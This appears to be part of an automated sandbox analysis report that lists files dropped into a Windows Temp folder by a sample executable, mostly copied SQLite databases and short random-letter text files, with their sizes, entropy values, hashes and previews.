                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp5E9E.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):40960
                                                                Entropy (8bit):0.792852251086831
                                                                Encrypted:false
                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp5F6A.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):0.698304057893793
                                                                Encrypted:false
                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp6026.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):0.698304057893793
                                                                Encrypted:false
                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp621B.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp6316.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp6411.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp64DD.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp65A9.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp66D3.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp677.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):40960
                                                                Entropy (8bit):0.792852251086831
                                                                Encrypted:false
                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp679F.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp67E7.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1026
                                                                Entropy (8bit):4.704010251295094
                                                                Encrypted:false
                                                                SSDEEP:24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
                                                                MD5:DF05C5F93419C56BFE3A84BDCC929382
                                                                SHA1:36AABBCD46C0F368E18FA602E486816D2578F48E
                                                                SHA-256:F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
                                                                SHA-512:EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
                                                                Malicious:false
                                                                Preview:MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

                                                                C:\Users\user\AppData\Local\Temp\tmp68C9.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp6A32.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp6AEE.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmp8522.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1026
                                                                Entropy (8bit):4.70435191336402
                                                                Encrypted:false
                                                                SSDEEP:24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
                                                                MD5:8C1F71001ABC7FCE68B3F15299553CE7
                                                                SHA1:382285FB69081EB79C936BC4E1BFFC9D4697D881
                                                                SHA-256:DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
                                                                SHA-512:8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
                                                                Malicious:false
                                                                Preview:NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

                                                                C:\Users\user\AppData\Local\Temp\tmp8BB2.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmpA614.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):1.1874185457069584
                                                                Encrypted:false
                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmpAE0.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1026
                                                                Entropy (8bit):4.698801429970146
                                                                Encrypted:false
                                                                SSDEEP:24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
                                                                MD5:488BC4EF686937916ECE6285266A6075
                                                                SHA1:498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
                                                                SHA-256:8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
                                                                SHA-512:1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
                                                                Malicious:false
                                                                Preview:ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

                                                                C:\Users\user\AppData\Local\Temp\tmpBED1.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1026
                                                                Entropy (8bit):4.696312162983912
                                                                Encrypted:false
                                                                SSDEEP:24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
                                                                MD5:83B91EFB8185C5AF5A6B60F4FE9CC2D2
                                                                SHA1:0EB7AE1817790DFC5225A02B74A272C84FEE4240
                                                                SHA-256:8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
                                                                SHA-512:F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
                                                                Malicious:false
